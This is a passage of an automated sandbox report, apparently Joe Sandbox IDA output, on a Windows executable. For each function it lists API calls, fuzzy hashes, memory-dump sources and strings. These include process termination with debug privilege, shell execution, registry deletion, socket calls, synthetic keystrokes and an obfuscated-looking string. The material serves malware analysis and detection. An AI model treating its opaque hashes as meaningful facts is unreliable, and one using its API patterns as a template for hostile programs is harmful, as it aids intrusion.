                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                            • String ID:
                                            • API String ID: 1957940570-0
                                            • Opcode ID: ae928a5b9f25e86424218ac155371617d95c07e987f587b59a6ca97e89516533
                                            • Instruction ID: 8d4fbc376843c3a41e8bd3aadeed09fbc229ff77c7e4392b90ef58f88fae040f
                                            • Opcode Fuzzy Hash: ae928a5b9f25e86424218ac155371617d95c07e987f587b59a6ca97e89516533
                                            • Instruction Fuzzy Hash: 7201BFB6240344BFE710ABA9EC4DF5B7BACFB88711F014415FA05DB2D1D6749800CB61
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: NULL Pointer assignment$Not an Object type
                                            • API String ID: 0-572801152
                                            • Opcode ID: 18637ca9518b8bacdfe2f7bc0440696b62369059997bbf084d997f804e72e2bc
                                            • Instruction ID: 7ba2d4e65ed9849544ef87b698471e62380b57d356f35bb1307aacaab8f373a3
                                            • Opcode Fuzzy Hash: 18637ca9518b8bacdfe2f7bc0440696b62369059997bbf084d997f804e72e2bc
                                            • Instruction Fuzzy Hash: F0E18F71A00319AFDF14DFA8C885AAEB7B5FB48355F148029ED05EB281E770AD49CF91
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Variant$ClearInit$_memset
                                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                            • API String ID: 2862541840-625585964
                                            • Opcode ID: cac100be64d5724b77cc72fde9e16f35a1218afb5962b490080b73138fb202cb
                                            • Instruction ID: c5e46e396cf889e9269f0605d40627f281e64224ada3e2c250d6c5d07a176441
                                            • Opcode Fuzzy Hash: cac100be64d5724b77cc72fde9e16f35a1218afb5962b490080b73138fb202cb
                                            • Instruction Fuzzy Hash: 16919D71A00219ABDF24DFA5C844FAEBBB8FF55715F108159F915EB280DB709948CFA0
                                            APIs
                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00869B19
                                            • SendMessageW.USER32(?,00001036,00000000,?), ref: 00869B2D
                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00869B47
                                            • _wcscat.LIBCMT ref: 00869BA2
                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 00869BB9
                                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00869BE7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: MessageSend$Window_wcscat
                                            • String ID: SysListView32
                                            • API String ID: 307300125-78025650
                                            • Opcode ID: ff2e622ada899c9313e40f57b406c0a8ee64025d1e4c30deb151c85f9f538613
                                            • Instruction ID: 653de53e282e83e785e35429c754a221bca72ac7ddd6d4ff4d1926963fb0ebb4
                                            • Opcode Fuzzy Hash: ff2e622ada899c9313e40f57b406c0a8ee64025d1e4c30deb151c85f9f538613
                                            • Instruction Fuzzy Hash: B6419D70A00318ABDF219FA8D885FEA77A8FB08350F11052AF589E72D2D6719D84CB64
                                            APIs
                                              • Part of subcall function 00846532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00846554
                                              • Part of subcall function 00846532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00846564
                                              • Part of subcall function 00846532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 008465F9
                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0086179A
                                            • GetLastError.KERNEL32 ref: 008617AD
                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 008617D9
                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00861855
                                            • GetLastError.KERNEL32(00000000), ref: 00861860
                                            • CloseHandle.KERNEL32(00000000), ref: 00861895
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                            • String ID: SeDebugPrivilege
                                            • API String ID: 2533919879-2896544425
                                            • Opcode ID: 66c0a3e1664bf1f62b2dfc88322c1a4c30d480ed96a68233e700baf283e451bb
                                            • Instruction ID: c704205624927bb4f73dd6fab58a173509ef3d1f2967f71a74d8fe8d7638b56a
                                            • Opcode Fuzzy Hash: 66c0a3e1664bf1f62b2dfc88322c1a4c30d480ed96a68233e700baf283e451bb
                                            • Instruction Fuzzy Hash: 90418E71600205AFDB05EF58C899FADB7A6FF54310F098068F906DB3D2DB7499448B92
                                            APIs
                                            • LoadIconW.USER32(00000000,00007F03), ref: 008458B8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: IconLoad
                                            • String ID: blank$info$question$stop$warning
                                            • API String ID: 2457776203-404129466
                                            • Opcode ID: c2f28c63bbf7bcb85b831e1a290c9a41542dd806d4cf7cf78e1d0826cee03743
                                            • Instruction ID: 4c0470b5ae2e8d81f8b847f3ff95e9bf505a1dde6de24bc77bb626ccdd537b71
                                            • Opcode Fuzzy Hash: c2f28c63bbf7bcb85b831e1a290c9a41542dd806d4cf7cf78e1d0826cee03743
                                            • Instruction Fuzzy Hash: 9211EB3164D75EBBE7015A58AC92DAF739CFF25314B20003AF510E53C3EF74AA404665
                                            APIs
                                            • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0084A806
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: ArraySafeVartype
                                            • String ID:
                                            • API String ID: 1725837607-0
                                            • Opcode ID: 74bea4719dadd879628da304e76297d704df387dc0ab027438fd85fd3cc51eab
                                            • Instruction ID: bc8712fff6fa4c8ebd7cfe7e0b30d8c94fc8204f251eb4936458c7a7a43bce1c
                                            • Opcode Fuzzy Hash: 74bea4719dadd879628da304e76297d704df387dc0ab027438fd85fd3cc51eab
                                            • Instruction Fuzzy Hash: E1C19F75A4021EDFDB18DF98C481BAEBBF4FF08314F24406AE655EB281D734A941CB96
                                            APIs
                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00846B63
                                            • LoadStringW.USER32(00000000), ref: 00846B6A
                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00846B80
                                            • LoadStringW.USER32(00000000), ref: 00846B87
                                            • _wprintf.LIBCMT ref: 00846BAD
                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00846BCB
                                            Strings
                                            • %s (%d) : ==> %s: %s %s, xrefs: 00846BA8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: HandleLoadModuleString$Message_wprintf
                                            • String ID: %s (%d) : ==> %s: %s %s
                                            • API String ID: 3648134473-3128320259
                                            • Opcode ID: 452b6da5945b7ca80bef0bd2dc6b04c795339677cfaea35583324c69f3e386d8
                                            • Instruction ID: 41b67a625f43e6a0b06f64c7425a9cc4027e42ed05458783a5e6caa32f708c51
                                            • Opcode Fuzzy Hash: 452b6da5945b7ca80bef0bd2dc6b04c795339677cfaea35583324c69f3e386d8
                                            • Instruction Fuzzy Hash: 730112F6500318BFEB11A7949D89EE7776CFB08304F004495B746D2181EA749E848B75
                                            APIs
                                              • Part of subcall function 00863C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00862BB5,?,?), ref: 00863C1D
                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00862BF6
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: BuffCharConnectRegistryUpper
                                            • String ID:
                                            • API String ID: 2595220575-0
                                            • Opcode ID: 7735d06782d6e4b0a481ce3917e7430a33e69b43753ef9e9acc74d4486a5e9d1
                                            • Instruction ID: 1537a19f9bb466ef2ee6deee8aec632b9326696cabaa9bda09a916b21c5e46a5
                                            • Opcode Fuzzy Hash: 7735d06782d6e4b0a481ce3917e7430a33e69b43753ef9e9acc74d4486a5e9d1
                                            • Instruction Fuzzy Hash: 9B9198712046059FCB10EF58C891B6EB7E9FF88314F05885DF996DB2A2DB34E945CB82
                                            APIs
                                            • select.WSOCK32 ref: 00859691
                                            • WSAGetLastError.WSOCK32(00000000), ref: 0085969E
                                            • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 008596C8
                                            • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 008596E9
                                            • WSAGetLastError.WSOCK32(00000000), ref: 008596F8
                                            • htons.WSOCK32(?,?,?,00000000,?), ref: 008597AA
                                            • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,0089DC00), ref: 00859765
                                              • Part of subcall function 0083D2FF: _strlen.LIBCMT ref: 0083D309
                                            • _strlen.LIBCMT ref: 00859800
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: ErrorLast_strlen$htonsinet_ntoaselect
                                            • String ID:
                                            • API String ID: 3480843537-0
                                            • Opcode ID: bbf9f56305d4906f7d20f861ce2747b0423acb3a7a9ad5c958e83e6aebbc3263
                                            • Instruction ID: 5cd0fb0493cd6d3f0334b1f1c1e64fafc94b80437660c7fa62f1eda8811632f3
                                            • Opcode Fuzzy Hash: bbf9f56305d4906f7d20f861ce2747b0423acb3a7a9ad5c958e83e6aebbc3263
                                            • Instruction Fuzzy Hash: D3819D71504204ABC714EF68CC95E6BB7E8FF99714F104A29F995DB2D1EB30E908CB92
                                            APIs
                                            • __mtinitlocknum.LIBCMT ref: 0082A991
                                              • Part of subcall function 00827D7C: __FF_MSGBANNER.LIBCMT ref: 00827D91
                                              • Part of subcall function 00827D7C: __NMSG_WRITE.LIBCMT ref: 00827D98
                                              • Part of subcall function 00827D7C: __malloc_crt.LIBCMT ref: 00827DB8
                                            • __lock.LIBCMT ref: 0082A9A4
                                            • __lock.LIBCMT ref: 0082A9F0
                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,008B6DE0,00000018,00835E7B,?,00000000,00000109), ref: 0082AA0C
                                            • EnterCriticalSection.KERNEL32(8000000C,008B6DE0,00000018,00835E7B,?,00000000,00000109), ref: 0082AA29
                                            • LeaveCriticalSection.KERNEL32(8000000C), ref: 0082AA39
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                            • String ID:
                                            • API String ID: 1422805418-0
                                            • Opcode ID: 2aea7db9df667bd11e2a82365690652d05e669e0c90241bbe26f472e63a4fec0
                                            • Instruction ID: ac56d4285094cfbb4c40c46fb6fe61c7475d49064dd8e49f69f68e797c18e84d
                                            • Opcode Fuzzy Hash: 2aea7db9df667bd11e2a82365690652d05e669e0c90241bbe26f472e63a4fec0
                                            • Instruction Fuzzy Hash: E04117719002359BEB189FACEA4575CBBB0FF01335F248219E42AEB2D1D77499D4CB92
                                            APIs
                                            • DeleteObject.GDI32(00000000), ref: 00868EE4
                                            • GetDC.USER32(00000000), ref: 00868EEC
                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00868EF7
                                            • ReleaseDC.USER32(00000000,00000000), ref: 00868F03
                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00868F3F
                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00868F50
                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0086BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00868F8A
                                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00868FAA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                            • String ID:
                                            • API String ID: 3864802216-0
                                            • Opcode ID: b3222388f022b84f41e78feb542370b11a5cb75ccf523ea99a8045d8d58dbe08
                                            • Instruction ID: 293b4c946beea92159ffa6a16c3528fbf25434bc658d0f874eb6961a3771e801
                                            • Opcode Fuzzy Hash: b3222388f022b84f41e78feb542370b11a5cb75ccf523ea99a8045d8d58dbe08
                                            • Instruction Fuzzy Hash: 47316B72200614BFEF108F54CC8AFEA3BAAFF49765F054165FE08DA191DAB59841CBB0
                                            APIs
                                              • Part of subcall function 0080936C: __swprintf.LIBCMT ref: 008093AB
                                              • Part of subcall function 0080936C: __itow.LIBCMT ref: 008093DF
                                              • Part of subcall function 0081C6F4: _wcscpy.LIBCMT ref: 0081C717
                                            • _wcstok.LIBCMT ref: 0085184E
                                            • _wcscpy.LIBCMT ref: 008518DD
                                            • _memset.LIBCMT ref: 00851910
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                            • String ID: X
                                            • API String ID: 774024439-3081909835
                                            • Opcode ID: ff0248caf498131e9f5709fcc1ef849ff581cf02831e464cbffd1526b026660b
                                            • Instruction ID: 320855d083a0c2cd4f7ac67e30671ca4f77b98b0433dbed34354cdc631ebaaa5
                                            • Opcode Fuzzy Hash: ff0248caf498131e9f5709fcc1ef849ff581cf02831e464cbffd1526b026660b
                                            • Instruction Fuzzy Hash: 6BC17C705043509FC764EF68C895AAAB7E4FF85354F00492DF98AD72A2DB30ED48CB82
                                            APIs
                                              • Part of subcall function 0081B34E: GetWindowLongW.USER32(?,000000EB), ref: 0081B35F
                                            • GetSystemMetrics.USER32(0000000F), ref: 0087016D
                                            • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 0087038D
                                            • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 008703AB
                                            • InvalidateRect.USER32(?,00000000,00000001,?), ref: 008703D6
                                            • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 008703FF
                                            • ShowWindow.USER32(00000003,00000000), ref: 00870421
                                            • DefDlgProcW.USER32(?,00000005,?,?), ref: 00870440
                                            Similarity
                                            • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                            • String ID:
                                            • API String ID: 3356174886-0
                                            • Opcode ID: a0ec3509b0682489638ee17b9995dc9b61b923ec3e2e77609b82d6e4ebff3124
                                            • Instruction ID: 1533dfddb43d1e8b7c7607860ceba8cf9dea6515ad89c2e08008f3aeceae9dbb
                                            • Opcode Fuzzy Hash: a0ec3509b0682489638ee17b9995dc9b61b923ec3e2e77609b82d6e4ebff3124
                                            • Instruction Fuzzy Hash: C6A17C3560061AEBDB18CF68C989BADBBB1FB08705F14C115E858EB299D774ED60CF90
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 97bbcb31a5e2a39e68bcf2a9e5f3cc84cb737683aa46e8f793d458d2004bb20a
                                            • Instruction ID: 60fb5987a6badd5e28cb16e1aaea3e86144fc980f596d0339191237f6c290b1c
                                            • Opcode Fuzzy Hash: 97bbcb31a5e2a39e68bcf2a9e5f3cc84cb737683aa46e8f793d458d2004bb20a
                                            • Instruction Fuzzy Hash: 89714C71901509EFCB18CF98CC89AEEBB79FF89314F148159F915EA251C7309A42CB61
                                            APIs
                                            • _memset.LIBCMT ref: 0086225A
                                            • _memset.LIBCMT ref: 00862323
                                            • ShellExecuteExW.SHELL32(?), ref: 00862368
                                              • Part of subcall function 0080936C: __swprintf.LIBCMT ref: 008093AB
                                              • Part of subcall function 0080936C: __itow.LIBCMT ref: 008093DF
                                              • Part of subcall function 0081C6F4: _wcscpy.LIBCMT ref: 0081C717
                                            • CloseHandle.KERNEL32(00000000), ref: 0086242F
                                            • FreeLibrary.KERNEL32(00000000), ref: 0086243E
                                            Similarity
                                            • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                            • String ID: @
                                            • API String ID: 4082843840-2766056989
                                            • Opcode ID: 1d548d2cc6457c8f27bd11cc692f527de84eb0124716eee2f582d7336e81cf1c
                                            • Instruction ID: 6b6a54610fbed4670b95b3d0e0aaf92cab5bdb6f33f10f2cb11b17565b6b0d29
                                            • Opcode Fuzzy Hash: 1d548d2cc6457c8f27bd11cc692f527de84eb0124716eee2f582d7336e81cf1c
                                            • Instruction Fuzzy Hash: 6F716D74A006199FCF04EFA8C99199EBBF5FF48310F118499E855EB3A1DB34AD40CB95
                                            APIs
                                            • GetParent.USER32(?), ref: 00843DE7
                                            • GetKeyboardState.USER32(?), ref: 00843DFC
                                            • SetKeyboardState.USER32(?), ref: 00843E5D
                                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 00843E8B
                                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 00843EAA
                                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 00843EF0
                                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00843F13
                                            Similarity
                                            • API ID: MessagePost$KeyboardState$Parent
                                            • String ID:
                                            • API String ID: 87235514-0
                                            • Opcode ID: c081556fb5e779b9dac36bc659c9598435485531a762df207a5037508e23d5e7
                                            • Instruction ID: c727ef9a1fd528c2d52929e58e06d4fa8da0b299ef2ecdce99fb7676cf1793aa
                                            • Opcode Fuzzy Hash: c081556fb5e779b9dac36bc659c9598435485531a762df207a5037508e23d5e7
                                            • Instruction Fuzzy Hash: CC51A2A0A047D93DFB3647288C45BB67FA9BB06304F084589E0D5D68C3D799AEC8D761
                                            APIs
                                            • GetParent.USER32(00000000), ref: 00843C02
                                            • GetKeyboardState.USER32(?), ref: 00843C17
                                            • SetKeyboardState.USER32(?), ref: 00843C78
                                            • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00843CA4
                                            • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00843CC1
                                            • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00843D05
                                            • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00843D26
                                            Similarity
                                            • API ID: MessagePost$KeyboardState$Parent
                                            • String ID:
                                            • API String ID: 87235514-0
                                            • Opcode ID: dace2fdb0b82a20fbe1d3b0c9f910a2279a7ff0f51209b106fbeed24e3d17a76
                                            • Instruction ID: 4adfe5cb60aec7aa349369c109b7f3a1636a157a364ddc7d99f6044f35633983
                                            • Opcode Fuzzy Hash: dace2fdb0b82a20fbe1d3b0c9f910a2279a7ff0f51209b106fbeed24e3d17a76
                                            • Instruction Fuzzy Hash: 7451D6A09047D93DFB3687288C55B76BFA9FF06304F088489E0D5D64C2D694EE94D751
                                            Similarity
                                            • API ID: _wcsncpy$LocalTime
                                            • String ID:
                                            • API String ID: 2945705084-0
                                            • Opcode ID: a51aaca0ef7e8fb1f95c2eb63a86cce8bb03558ed074bf82fa50d88eac852ab0
                                            • Instruction ID: 43fd45059e4847c5dfd9f86831a17c26bea95ffbff2c86528323a54c2c5d48b2
                                            • Opcode Fuzzy Hash: a51aaca0ef7e8fb1f95c2eb63a86cce8bb03558ed074bf82fa50d88eac852ab0
                                            • Instruction Fuzzy Hash: 50415166C1022876DB10EBF8DC4A9CF73ACFF14310F5089A6E504E3122EB34E65487A6
                                            APIs
                                            • GetCursorPos.USER32(000000FF), ref: 0081B64F
                                            • ScreenToClient.USER32(00000000,000000FF), ref: 0081B66C
                                            • GetAsyncKeyState.USER32(00000001), ref: 0081B691
                                            • GetAsyncKeyState.USER32(00000002), ref: 0081B69F
                                            Strings
                                            • aqg5cvv9aqg55vv9aqg52vv9aqg5fvv9aqg5fvv9aqg55vv9aqg55vv9aqg51vv9aqg5cvv9aqg58vv9aqg55vv9aqg5cvv9aqg50vv9aqg57vv9aqg5, xrefs: 0087DFDC
                                            Similarity
                                            • API ID: AsyncState$ClientCursorScreen
                                            • String ID: aqg5cvv9aqg55vv9aqg52vv9aqg5fvv9aqg5fvv9aqg55vv9aqg55vv9aqg51vv9aqg5cvv9aqg58vv9aqg55vv9aqg5cvv9aqg50vv9aqg57vv9aqg5
                                            • API String ID: 4210589936-3175721085
                                            • Opcode ID: 97603c986ffcfeece680e3f6e10618af7fdede47e425ec2c4ec12bd9989e26f9
                                            • Instruction ID: 7b5b07c504edd8f2e8ee9e11f1620113c00c6f7a939bf7c205a362a97311c8df
                                            • Opcode Fuzzy Hash: 97603c986ffcfeece680e3f6e10618af7fdede47e425ec2c4ec12bd9989e26f9
                                            • Instruction Fuzzy Hash: 15416071604219FBCF159F68C844AE9BB74FF15324F10831AF829D6290CB31AD94DF91
                                            APIs
                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00863DA1
                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00863DCB
                                            • FreeLibrary.KERNEL32(00000000), ref: 00863E80
                                              • Part of subcall function 00863D72: RegCloseKey.ADVAPI32(?), ref: 00863DE8
                                              • Part of subcall function 00863D72: FreeLibrary.KERNEL32(?), ref: 00863E3A
                                              • Part of subcall function 00863D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00863E5D
                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00863E25
                                            Similarity
